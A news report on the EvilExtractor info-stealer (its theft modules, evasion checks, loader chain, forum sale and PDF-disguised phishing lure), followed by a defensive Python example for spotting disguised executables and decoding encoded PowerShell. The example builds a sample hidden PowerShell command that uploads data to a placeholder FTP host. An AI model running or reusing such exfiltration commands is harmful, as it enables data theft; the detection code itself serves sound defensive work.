The powerful data-stealing tool has already been used in a number of cyberattacks.
Fortinet security researchers have reported the discovery of a powerful new malware family named EvilExtractor. Its seller markets it as an all-in-one data-stealing tool. The malware costs only $39, which is very low for software of this kind.
As the researchers noted, the malware consists of several modules. Besides its data-stealing functionality, the tool has an environment checker and an anti-virtual-machine check intended to evade security tooling. The data-theft modules upload what they collect to an FTP server controlled by the attackers. The executable analysed was an obfuscated Python-based program designed to run a .NET loader, which in turn uses a Base64-encoded PowerShell script to launch EvilExtractor.
EvilExtractor’s functionality is extensive. Among other things, the malware can steal system metadata, passwords and browser cookies, and it includes a keylogger. It can also switch on the webcam covertly and take screenshots unnoticed. Most dangerous is a module that encrypts files on the victim’s computer for subsequent extortion.
Swiss army knife malware for mere pennies
Researchers are particularly concerned about EvilExtractor because of its extremely low price. A hacker using the alias Kodex is selling the tool on the Cracked forum for just $39. It is unclear whether this is a one-time payment or a subscription. Even if the author intends recurring payments, the amount is still very small compared with other tools of this type.
The software went on sale on October 22, 2022, and by March 2023 several attacks spreading EvilExtractor in the wild (ITW) had been observed against users in Europe and the US. At least one phishing campaign involving the malware was also recorded: the attackers disguised EvilExtractor as a PDF document that was in fact an executable file named “Account_Info.exe”.
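Two defender-side checks for the traits reported above (an executable passed off as a PDF document, and a Base64-encoded PowerShell stage that talks to an FTP server), written as an added Python example; this is not code from the Fortinet report, and the attachment bytes, file names and command line it uses are constructed samples.

```python
import base64
import re

# Constructed samples for this example; they are not artefacts from the Fortinet report.
SAMPLE_SCRIPT = "Invoke-WebRequest 'ftp://EXAMPLE-PLACEHOLDER/upload' -Method Put"
SAMPLE_CMDLINE = (
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


def classify_attachment(name: str, data: bytes) -> str:
    """Compare an attachment's claimed type with its real content.

    The lure described above was presented as a PDF but was a Windows executable,
    so the check keys on the PE 'MZ' header rather than on the file name."""
    lower = name.lower()
    if data.startswith(b"MZ"):
        # A document extension anywhere in the name (e.g. Account_Info.pdf.exe) is a disguise.
        if any(ext in lower for ext in DOCUMENT_EXTS):
            return "pe-disguised-as-document"
        return "pe-executable"
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "other"


# PowerShell accepts -EncodedCommand and its unambiguous prefixes; -e, -ec and -enc are the common ones.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_powershell(cmdline: str):
    """Return the plaintext behind an -EncodedCommand argument, or None if there is none.

    -EncodedCommand takes Base64 of UTF-16LE text, the form the loader above uses to
    hide the script that starts the stealer."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def exfil_indicators(script: str) -> list:
    """Flag traits the article attributes to the stager: FTP transfers and nested Base64."""
    hits = []
    if re.search(r"\bftp://", script, re.IGNORECASE):
        hits.append("ftp-upload")
    if "FromBase64String" in script:
        hits.append("nested-base64")
    return hits
```

Run the decoded script through `exfil_indicators` only after `decode_encoded_powershell` returns text; a `None` result means the command line carried no encoded payload, not that it is clean.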